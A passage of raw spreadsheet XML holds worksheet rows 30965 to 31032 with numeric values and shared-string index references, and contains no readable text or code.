        <v>2.3169827E7</v>
      </c>
      <c r="C30965" s="2" t="s">
        <v>29776</v>
      </c>
      <c r="D30965" s="2">
        <v>1.0</v>
      </c>
      <c r="E30965" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30965" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30966" ht="15.75" customHeight="1">
      <c r="A30966" s="1">
        <v>1165.0</v>
      </c>
      <c r="B30966" s="2">
        <v>2.4519855E7</v>
      </c>
      <c r="C30966" s="2" t="s">
        <v>29777</v>
      </c>
      <c r="D30966" s="2">
        <v>1.0</v>
      </c>
      <c r="E30966" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30966" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30967" ht="15.75" customHeight="1">
      <c r="A30967" s="1">
        <v>1297.0</v>
      </c>
      <c r="B30967" s="2">
        <v>2.562811E7</v>
      </c>
      <c r="C30967" s="2" t="s">
        <v>29778</v>
      </c>
      <c r="D30967" s="2">
        <v>1.0</v>
      </c>
      <c r="E30967" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30967" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30968" ht="15.75" customHeight="1">
      <c r="A30968" s="1">
        <v>1553.0</v>
      </c>
      <c r="B30968" s="2">
        <v>2.7650622E7</v>
      </c>
      <c r="C30968" s="2" t="s">
        <v>29779</v>
      </c>
      <c r="D30968" s="2">
        <v>1.0</v>
      </c>
      <c r="E30968" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30968" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30969" ht="15.75" customHeight="1">
      <c r="A30969" s="1">
        <v>1669.0</v>
      </c>
      <c r="B30969" s="2">
        <v>2.8257516E7</v>
      </c>
      <c r="C30969" s="2" t="s">
        <v>29780</v>
      </c>
      <c r="D30969" s="2">
        <v>1.0</v>
      </c>
      <c r="E30969" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30969" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30970" ht="15.75" customHeight="1">
      <c r="A30970" s="1">
        <v>1697.0</v>
      </c>
      <c r="B30970" s="2">
        <v>2851921.0</v>
      </c>
      <c r="C30970" s="2" t="s">
        <v>29781</v>
      </c>
      <c r="D30970" s="2">
        <v>1.0</v>
      </c>
      <c r="E30970" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30970" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30971" ht="15.75" customHeight="1">
      <c r="A30971" s="1">
        <v>2063.0</v>
      </c>
      <c r="B30971" s="2">
        <v>3.1040595E7</v>
      </c>
      <c r="C30971" s="2" t="s">
        <v>29782</v>
      </c>
      <c r="D30971" s="2">
        <v>1.0</v>
      </c>
      <c r="E30971" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30971" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30972" ht="15.75" customHeight="1">
      <c r="A30972" s="1">
        <v>2094.0</v>
      </c>
      <c r="B30972" s="2">
        <v>3.1302903E7</v>
      </c>
      <c r="C30972" s="2" t="s">
        <v>29783</v>
      </c>
      <c r="D30972" s="2">
        <v>1.0</v>
      </c>
      <c r="E30972" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30972" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30973" ht="15.75" customHeight="1">
      <c r="A30973" s="1">
        <v>2110.0</v>
      </c>
      <c r="B30973" s="2">
        <v>3.1356081E7</v>
      </c>
      <c r="C30973" s="2" t="s">
        <v>29784</v>
      </c>
      <c r="D30973" s="2">
        <v>1.0</v>
      </c>
      <c r="E30973" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30973" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30974" ht="15.75" customHeight="1">
      <c r="A30974" s="1">
        <v>2229.0</v>
      </c>
      <c r="B30974" s="2">
        <v>3.2252742E7</v>
      </c>
      <c r="C30974" s="2" t="s">
        <v>29785</v>
      </c>
      <c r="D30974" s="2">
        <v>1.0</v>
      </c>
      <c r="E30974" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30974" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30975" ht="15.75" customHeight="1">
      <c r="A30975" s="1">
        <v>2321.0</v>
      </c>
      <c r="B30975" s="2">
        <v>3.2889406E7</v>
      </c>
      <c r="C30975" s="2" t="s">
        <v>29786</v>
      </c>
      <c r="D30975" s="2">
        <v>1.0</v>
      </c>
      <c r="E30975" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30975" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30976" ht="15.75" customHeight="1">
      <c r="A30976" s="1">
        <v>2345.0</v>
      </c>
      <c r="B30976" s="2">
        <v>3.3056505E7</v>
      </c>
      <c r="C30976" s="2" t="s">
        <v>29787</v>
      </c>
      <c r="D30976" s="2">
        <v>1.0</v>
      </c>
      <c r="E30976" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30976" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30977" ht="15.75" customHeight="1">
      <c r="A30977" s="1">
        <v>2468.0</v>
      </c>
      <c r="B30977" s="2">
        <v>3.3821106E7</v>
      </c>
      <c r="C30977" s="2" t="s">
        <v>29788</v>
      </c>
      <c r="D30977" s="2">
        <v>1.0</v>
      </c>
      <c r="E30977" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30977" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30978" ht="15.75" customHeight="1">
      <c r="A30978" s="1">
        <v>2550.0</v>
      </c>
      <c r="B30978" s="2">
        <v>3.4130536E7</v>
      </c>
      <c r="C30978" s="2" t="s">
        <v>29789</v>
      </c>
      <c r="D30978" s="2">
        <v>1.0</v>
      </c>
      <c r="E30978" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30978" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30979" ht="15.75" customHeight="1">
      <c r="A30979" s="1">
        <v>2590.0</v>
      </c>
      <c r="B30979" s="2">
        <v>3.4337275E7</v>
      </c>
      <c r="C30979" s="2" t="s">
        <v>29790</v>
      </c>
      <c r="D30979" s="2">
        <v>1.0</v>
      </c>
      <c r="E30979" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30979" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30980" ht="15.75" customHeight="1">
      <c r="A30980" s="1">
        <v>2742.0</v>
      </c>
      <c r="B30980" s="2">
        <v>3.5023215E7</v>
      </c>
      <c r="C30980" s="2" t="s">
        <v>29791</v>
      </c>
      <c r="D30980" s="2">
        <v>1.0</v>
      </c>
      <c r="E30980" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30980" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30981" ht="15.75" customHeight="1">
      <c r="A30981" s="1">
        <v>2745.0</v>
      </c>
      <c r="B30981" s="2">
        <v>3.5030173E7</v>
      </c>
      <c r="C30981" s="2" t="s">
        <v>29792</v>
      </c>
      <c r="D30981" s="2">
        <v>1.0</v>
      </c>
      <c r="E30981" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30981" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30982" ht="15.75" customHeight="1">
      <c r="A30982" s="1">
        <v>2920.0</v>
      </c>
      <c r="B30982" s="2">
        <v>3.5840669E7</v>
      </c>
      <c r="C30982" s="2" t="s">
        <v>29793</v>
      </c>
      <c r="D30982" s="2">
        <v>1.0</v>
      </c>
      <c r="E30982" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30982" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30983" ht="15.75" customHeight="1">
      <c r="A30983" s="1">
        <v>2994.0</v>
      </c>
      <c r="B30983" s="2">
        <v>3.6265016E7</v>
      </c>
      <c r="C30983" s="2" t="s">
        <v>29794</v>
      </c>
      <c r="D30983" s="2">
        <v>1.0</v>
      </c>
      <c r="E30983" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30983" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30984" ht="15.75" customHeight="1">
      <c r="A30984" s="1">
        <v>3089.0</v>
      </c>
      <c r="B30984" s="2">
        <v>3.6654883E7</v>
      </c>
      <c r="C30984" s="2" t="s">
        <v>29795</v>
      </c>
      <c r="D30984" s="2">
        <v>1.0</v>
      </c>
      <c r="E30984" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30984" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30985" ht="15.75" customHeight="1">
      <c r="A30985" s="1">
        <v>3308.0</v>
      </c>
      <c r="B30985" s="2">
        <v>3.7590043E7</v>
      </c>
      <c r="C30985" s="2" t="s">
        <v>29796</v>
      </c>
      <c r="D30985" s="2">
        <v>1.0</v>
      </c>
      <c r="E30985" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30985" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30986" ht="15.75" customHeight="1">
      <c r="A30986" s="1">
        <v>3787.0</v>
      </c>
      <c r="B30986" s="2">
        <v>3.9937356E7</v>
      </c>
      <c r="C30986" s="2" t="s">
        <v>29797</v>
      </c>
      <c r="D30986" s="2">
        <v>1.0</v>
      </c>
      <c r="E30986" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30986" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30987" ht="15.75" customHeight="1">
      <c r="A30987" s="1">
        <v>3850.0</v>
      </c>
      <c r="B30987" s="2">
        <v>4.0259514E7</v>
      </c>
      <c r="C30987" s="2" t="s">
        <v>29798</v>
      </c>
      <c r="D30987" s="2">
        <v>1.0</v>
      </c>
      <c r="E30987" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30987" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30988" ht="15.75" customHeight="1">
      <c r="A30988" s="1">
        <v>4740.0</v>
      </c>
      <c r="B30988" s="2">
        <v>4.3360068E7</v>
      </c>
      <c r="C30988" s="2" t="s">
        <v>29799</v>
      </c>
      <c r="D30988" s="2">
        <v>1.0</v>
      </c>
      <c r="E30988" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30988" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30989" ht="15.75" customHeight="1">
      <c r="A30989" s="1">
        <v>5469.0</v>
      </c>
      <c r="B30989" s="2">
        <v>4.570848E7</v>
      </c>
      <c r="C30989" s="2" t="s">
        <v>29800</v>
      </c>
      <c r="D30989" s="2">
        <v>1.0</v>
      </c>
      <c r="E30989" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30989" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30990" ht="15.75" customHeight="1">
      <c r="A30990" s="1">
        <v>5603.0</v>
      </c>
      <c r="B30990" s="2">
        <v>4.6136334E7</v>
      </c>
      <c r="C30990" s="2" t="s">
        <v>29801</v>
      </c>
      <c r="D30990" s="2">
        <v>1.0</v>
      </c>
      <c r="E30990" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30990" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30991" ht="15.75" customHeight="1">
      <c r="A30991" s="1">
        <v>5668.0</v>
      </c>
      <c r="B30991" s="2">
        <v>4.6335292E7</v>
      </c>
      <c r="C30991" s="2" t="s">
        <v>29802</v>
      </c>
      <c r="D30991" s="2">
        <v>1.0</v>
      </c>
      <c r="E30991" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30991" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30992" ht="15.75" customHeight="1">
      <c r="A30992" s="1">
        <v>5790.0</v>
      </c>
      <c r="B30992" s="2">
        <v>4.6774724E7</v>
      </c>
      <c r="C30992" s="2" t="s">
        <v>29803</v>
      </c>
      <c r="D30992" s="2">
        <v>1.0</v>
      </c>
      <c r="E30992" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30992" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30993" ht="15.75" customHeight="1">
      <c r="A30993" s="1">
        <v>6067.0</v>
      </c>
      <c r="B30993" s="2">
        <v>4.7623346E7</v>
      </c>
      <c r="C30993" s="2" t="s">
        <v>29804</v>
      </c>
      <c r="D30993" s="2">
        <v>1.0</v>
      </c>
      <c r="E30993" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30993" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30994" ht="15.75" customHeight="1">
      <c r="A30994" s="1">
        <v>6332.0</v>
      </c>
      <c r="B30994" s="2">
        <v>4.8296312E7</v>
      </c>
      <c r="C30994" s="2" t="s">
        <v>29790</v>
      </c>
      <c r="D30994" s="2">
        <v>1.0</v>
      </c>
      <c r="E30994" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30994" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30995" ht="15.75" customHeight="1">
      <c r="A30995" s="1">
        <v>6618.0</v>
      </c>
      <c r="B30995" s="2">
        <v>4.9035412E7</v>
      </c>
      <c r="C30995" s="2" t="s">
        <v>29805</v>
      </c>
      <c r="D30995" s="2">
        <v>1.0</v>
      </c>
      <c r="E30995" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30995" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30996" ht="15.75" customHeight="1">
      <c r="A30996" s="1">
        <v>7168.0</v>
      </c>
      <c r="B30996" s="2">
        <v>5.0524141E7</v>
      </c>
      <c r="C30996" s="2" t="s">
        <v>29806</v>
      </c>
      <c r="D30996" s="2">
        <v>1.0</v>
      </c>
      <c r="E30996" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30996" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30997" ht="15.75" customHeight="1">
      <c r="A30997" s="1">
        <v>7259.0</v>
      </c>
      <c r="B30997" s="2">
        <v>5.074984E7</v>
      </c>
      <c r="C30997" s="2" t="s">
        <v>29807</v>
      </c>
      <c r="D30997" s="2">
        <v>1.0</v>
      </c>
      <c r="E30997" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30997" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30998" ht="15.75" customHeight="1">
      <c r="A30998" s="1">
        <v>7351.0</v>
      </c>
      <c r="B30998" s="2">
        <v>5.0986361E7</v>
      </c>
      <c r="C30998" s="2" t="s">
        <v>29808</v>
      </c>
      <c r="D30998" s="2">
        <v>1.0</v>
      </c>
      <c r="E30998" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30998" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="30999" ht="15.75" customHeight="1">
      <c r="A30999" s="1">
        <v>7365.0</v>
      </c>
      <c r="B30999" s="2">
        <v>5.1024553E7</v>
      </c>
      <c r="C30999" s="2" t="s">
        <v>29809</v>
      </c>
      <c r="D30999" s="2">
        <v>1.0</v>
      </c>
      <c r="E30999" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F30999" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31000" ht="15.75" customHeight="1">
      <c r="A31000" s="1">
        <v>7695.0</v>
      </c>
      <c r="B31000" s="2">
        <v>5.1956929E7</v>
      </c>
      <c r="C31000" s="2" t="s">
        <v>29810</v>
      </c>
      <c r="D31000" s="2">
        <v>1.0</v>
      </c>
      <c r="E31000" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31000" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31001" ht="15.75" customHeight="1">
      <c r="A31001" s="1">
        <v>7875.0</v>
      </c>
      <c r="B31001" s="2">
        <v>5.2410303E7</v>
      </c>
      <c r="C31001" s="2" t="s">
        <v>29811</v>
      </c>
      <c r="D31001" s="2">
        <v>1.0</v>
      </c>
      <c r="E31001" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31001" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31002" ht="15.75" customHeight="1">
      <c r="A31002" s="1">
        <v>7891.0</v>
      </c>
      <c r="B31002" s="2">
        <v>5.2442677E7</v>
      </c>
      <c r="C31002" s="2" t="s">
        <v>29812</v>
      </c>
      <c r="D31002" s="2">
        <v>1.0</v>
      </c>
      <c r="E31002" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31002" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31003" ht="15.75" customHeight="1">
      <c r="A31003" s="1">
        <v>8212.0</v>
      </c>
      <c r="B31003" s="2">
        <v>5.3310222E7</v>
      </c>
      <c r="C31003" s="2" t="s">
        <v>29813</v>
      </c>
      <c r="D31003" s="2">
        <v>1.0</v>
      </c>
      <c r="E31003" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31003" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31004" ht="15.75" customHeight="1">
      <c r="A31004" s="1">
        <v>8847.0</v>
      </c>
      <c r="B31004" s="2">
        <v>5.4723792E7</v>
      </c>
      <c r="C31004" s="2" t="s">
        <v>29790</v>
      </c>
      <c r="D31004" s="2">
        <v>1.0</v>
      </c>
      <c r="E31004" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31004" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31005" ht="15.75" customHeight="1">
      <c r="A31005" s="1">
        <v>8850.0</v>
      </c>
      <c r="B31005" s="2">
        <v>5.4723792E7</v>
      </c>
      <c r="C31005" s="2" t="s">
        <v>29814</v>
      </c>
      <c r="D31005" s="2">
        <v>1.0</v>
      </c>
      <c r="E31005" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31005" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31006" ht="15.75" customHeight="1">
      <c r="A31006" s="1">
        <v>8895.0</v>
      </c>
      <c r="B31006" s="2">
        <v>5478913.0</v>
      </c>
      <c r="C31006" s="2" t="s">
        <v>29815</v>
      </c>
      <c r="D31006" s="2">
        <v>1.0</v>
      </c>
      <c r="E31006" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31006" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31007" ht="15.75" customHeight="1">
      <c r="A31007" s="1">
        <v>9152.0</v>
      </c>
      <c r="B31007" s="2">
        <v>5.5272653E7</v>
      </c>
      <c r="C31007" s="2" t="s">
        <v>29816</v>
      </c>
      <c r="D31007" s="2">
        <v>1.0</v>
      </c>
      <c r="E31007" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31007" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31008" ht="15.75" customHeight="1">
      <c r="A31008" s="1">
        <v>9366.0</v>
      </c>
      <c r="B31008" s="2">
        <v>5.5682125E7</v>
      </c>
      <c r="C31008" s="2" t="s">
        <v>29817</v>
      </c>
      <c r="D31008" s="2">
        <v>1.0</v>
      </c>
      <c r="E31008" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31008" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31009" ht="15.75" customHeight="1">
      <c r="A31009" s="1">
        <v>9536.0</v>
      </c>
      <c r="B31009" s="2">
        <v>5.599157E7</v>
      </c>
      <c r="C31009" s="2" t="s">
        <v>29818</v>
      </c>
      <c r="D31009" s="2">
        <v>1.0</v>
      </c>
      <c r="E31009" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31009" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31010" ht="15.75" customHeight="1">
      <c r="A31010" s="1">
        <v>9621.0</v>
      </c>
      <c r="B31010" s="2">
        <v>5.6204261E7</v>
      </c>
      <c r="C31010" s="2" t="s">
        <v>29819</v>
      </c>
      <c r="D31010" s="2">
        <v>1.0</v>
      </c>
      <c r="E31010" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31010" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31011" ht="15.75" customHeight="1">
      <c r="A31011" s="1">
        <v>9799.0</v>
      </c>
      <c r="B31011" s="2">
        <v>5.6551939E7</v>
      </c>
      <c r="C31011" s="2" t="s">
        <v>29820</v>
      </c>
      <c r="D31011" s="2">
        <v>1.0</v>
      </c>
      <c r="E31011" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31011" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31012" ht="15.75" customHeight="1">
      <c r="A31012" s="1">
        <v>9984.0</v>
      </c>
      <c r="B31012" s="2">
        <v>5.6958316E7</v>
      </c>
      <c r="C31012" s="2" t="s">
        <v>29821</v>
      </c>
      <c r="D31012" s="2">
        <v>1.0</v>
      </c>
      <c r="E31012" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31012" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31013" ht="15.75" customHeight="1">
      <c r="A31013" s="1">
        <v>10239.0</v>
      </c>
      <c r="B31013" s="2">
        <v>5.7525102E7</v>
      </c>
      <c r="C31013" s="2" t="s">
        <v>29822</v>
      </c>
      <c r="D31013" s="2">
        <v>1.0</v>
      </c>
      <c r="E31013" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31013" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31014" ht="15.75" customHeight="1">
      <c r="A31014" s="1">
        <v>10270.0</v>
      </c>
      <c r="B31014" s="2">
        <v>5.762053E7</v>
      </c>
      <c r="C31014" s="2" t="s">
        <v>29823</v>
      </c>
      <c r="D31014" s="2">
        <v>1.0</v>
      </c>
      <c r="E31014" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31014" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31015" ht="15.75" customHeight="1">
      <c r="A31015" s="1">
        <v>10306.0</v>
      </c>
      <c r="B31015" s="2">
        <v>5.7669396E7</v>
      </c>
      <c r="C31015" s="2" t="s">
        <v>29824</v>
      </c>
      <c r="D31015" s="2">
        <v>1.0</v>
      </c>
      <c r="E31015" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31015" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31016" ht="15.75" customHeight="1">
      <c r="A31016" s="1">
        <v>10594.0</v>
      </c>
      <c r="B31016" s="2">
        <v>1.3430759E7</v>
      </c>
      <c r="C31016" s="2" t="s">
        <v>29825</v>
      </c>
      <c r="D31016" s="2">
        <v>1.0</v>
      </c>
      <c r="E31016" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31016" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31017" ht="15.75" customHeight="1">
      <c r="A31017" s="1">
        <v>10663.0</v>
      </c>
      <c r="B31017" s="2">
        <v>1.4303065E7</v>
      </c>
      <c r="C31017" s="2" t="s">
        <v>29826</v>
      </c>
      <c r="D31017" s="2">
        <v>1.0</v>
      </c>
      <c r="E31017" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31017" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31018" ht="15.75" customHeight="1">
      <c r="A31018" s="1">
        <v>10681.0</v>
      </c>
      <c r="B31018" s="2">
        <v>1.4667967E7</v>
      </c>
      <c r="C31018" s="2" t="s">
        <v>29827</v>
      </c>
      <c r="D31018" s="2">
        <v>1.0</v>
      </c>
      <c r="E31018" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31018" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31019" ht="15.75" customHeight="1">
      <c r="A31019" s="1">
        <v>10767.0</v>
      </c>
      <c r="B31019" s="2">
        <v>1.559919E7</v>
      </c>
      <c r="C31019" s="2" t="s">
        <v>29828</v>
      </c>
      <c r="D31019" s="2">
        <v>1.0</v>
      </c>
      <c r="E31019" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31019" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31020" ht="15.75" customHeight="1">
      <c r="A31020" s="1">
        <v>10906.0</v>
      </c>
      <c r="B31020" s="2">
        <v>1.6644724E7</v>
      </c>
      <c r="C31020" s="2" t="s">
        <v>29829</v>
      </c>
      <c r="D31020" s="2">
        <v>1.0</v>
      </c>
      <c r="E31020" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31020" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31021" ht="15.75" customHeight="1">
      <c r="A31021" s="1">
        <v>10919.0</v>
      </c>
      <c r="B31021" s="2">
        <v>1.6731472E7</v>
      </c>
      <c r="C31021" s="2" t="s">
        <v>29830</v>
      </c>
      <c r="D31021" s="2">
        <v>1.0</v>
      </c>
      <c r="E31021" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31021" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31022" ht="15.75" customHeight="1">
      <c r="A31022" s="1">
        <v>10944.0</v>
      </c>
      <c r="B31022" s="2">
        <v>1.7068152E7</v>
      </c>
      <c r="C31022" s="2" t="s">
        <v>29831</v>
      </c>
      <c r="D31022" s="2">
        <v>1.0</v>
      </c>
      <c r="E31022" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31022" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31023" ht="15.75" customHeight="1">
      <c r="A31023" s="1">
        <v>11137.0</v>
      </c>
      <c r="B31023" s="2">
        <v>1.9219203E7</v>
      </c>
      <c r="C31023" s="2" t="s">
        <v>29832</v>
      </c>
      <c r="D31023" s="2">
        <v>1.0</v>
      </c>
      <c r="E31023" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31023" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31024" ht="15.75" customHeight="1">
      <c r="A31024" s="1">
        <v>11154.0</v>
      </c>
      <c r="B31024" s="2">
        <v>1.9426711E7</v>
      </c>
      <c r="C31024" s="2" t="s">
        <v>29833</v>
      </c>
      <c r="D31024" s="2">
        <v>1.0</v>
      </c>
      <c r="E31024" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31024" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31025" ht="15.75" customHeight="1">
      <c r="A31025" s="1">
        <v>11457.0</v>
      </c>
      <c r="B31025" s="2">
        <v>2.1899334E7</v>
      </c>
      <c r="C31025" s="2" t="s">
        <v>29834</v>
      </c>
      <c r="D31025" s="2">
        <v>1.0</v>
      </c>
      <c r="E31025" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31025" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31026" ht="15.75" customHeight="1">
      <c r="A31026" s="1">
        <v>11470.0</v>
      </c>
      <c r="B31026" s="2">
        <v>2.1959077E7</v>
      </c>
      <c r="C31026" s="2" t="s">
        <v>29835</v>
      </c>
      <c r="D31026" s="2">
        <v>1.0</v>
      </c>
      <c r="E31026" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31026" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31027" ht="15.75" customHeight="1">
      <c r="A31027" s="1">
        <v>11543.0</v>
      </c>
      <c r="B31027" s="2">
        <v>2.2646498E7</v>
      </c>
      <c r="C31027" s="2" t="s">
        <v>29836</v>
      </c>
      <c r="D31027" s="2">
        <v>1.0</v>
      </c>
      <c r="E31027" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31027" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31028" ht="15.75" customHeight="1">
      <c r="A31028" s="1">
        <v>11722.0</v>
      </c>
      <c r="B31028" s="2">
        <v>2.3878648E7</v>
      </c>
      <c r="C31028" s="2" t="s">
        <v>29837</v>
      </c>
      <c r="D31028" s="2">
        <v>1.0</v>
      </c>
      <c r="E31028" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31028" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31029" ht="15.75" customHeight="1">
      <c r="A31029" s="1">
        <v>12076.0</v>
      </c>
      <c r="B31029" s="2">
        <v>2.6660458E7</v>
      </c>
      <c r="C31029" s="2" t="s">
        <v>29838</v>
      </c>
      <c r="D31029" s="2">
        <v>1.0</v>
      </c>
      <c r="E31029" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31029" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31030" ht="15.75" customHeight="1">
      <c r="A31030" s="1">
        <v>12240.0</v>
      </c>
      <c r="B31030" s="2">
        <v>2.7885802E7</v>
      </c>
      <c r="C31030" s="2" t="s">
        <v>29839</v>
      </c>
      <c r="D31030" s="2">
        <v>1.0</v>
      </c>
      <c r="E31030" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31030" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31031" ht="15.75" customHeight="1">
      <c r="A31031" s="1">
        <v>12329.0</v>
      </c>
      <c r="B31031" s="2">
        <v>2.8530271E7</v>
      </c>
      <c r="C31031" s="2" t="s">
        <v>29840</v>
      </c>
      <c r="D31031" s="2">
        <v>1.0</v>
      </c>
      <c r="E31031" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F31031" s="2">
        <v>0.1121212121212121</v>
      </c>
    </row>
    <row r="31032" ht="15.75" customHeight="1">
      <c r="A31032" s="1">
        <v>12330.0</v>
      </c>
      <c r="B31032" s="2">
